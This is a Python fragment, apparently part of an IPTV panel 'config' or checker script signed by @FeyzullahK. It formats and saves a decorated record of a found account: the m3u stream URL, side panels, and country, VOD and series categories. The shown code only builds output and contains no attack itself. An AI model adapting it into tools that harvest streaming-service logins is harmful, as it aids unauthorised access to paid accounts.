╠●🔑 Signature➤"""+SINGENC+"""
╠═╣🅵🅴🆈🆉🅾️""")
      	imza3=("""
╠●🔗m3u_Url➤"""+mlink+"""
╠═╣ᴘʏᴛʜᴏɴ 🅑-🅦 ᴘʏ ᴄᴏɴғɪɢ╠""")
      	#print(yanpanel)
      	if not yanpanel=="hata":
      		imzayan=("""
╠●🌐 Yan Paneller ➤ """+yanpanel.replace(" 🌎","\n╠●🌎")+"""🅵🅴🆈🆉🅾️""")
      	if kanalkata=="1" or kanalkata =="2":
      		imzab=("""
╠● @FeyzullahK╠═
╠● 💫 Ulke ➤      		
╠●"""+kategori+""" """)
#⚡️✨💫
      	if kanalkata =="2":
      		imzak=("""
╠● ✨ Vod ➤
╠●"""+kategoriv+"""
╠● ⚡️Seri ➤
╠●"""+kategoris+""" """)
      	imzas=("""
╚═ᴾʸᵗʰᵒⁿ ᴾʳᵒᵍʳᵃᵐᵐᵉʳ ᵇʸ ᶠᵉʸᶻᵒ══╝""")
      	imza=imza1+imzaa+imza2+imzasif+imzayan+imza3+imzab+imzak+imzas
      	yaz(imza+'\n'+'\n')
      	print('u' +imza)
      	print("********")
	##except:pass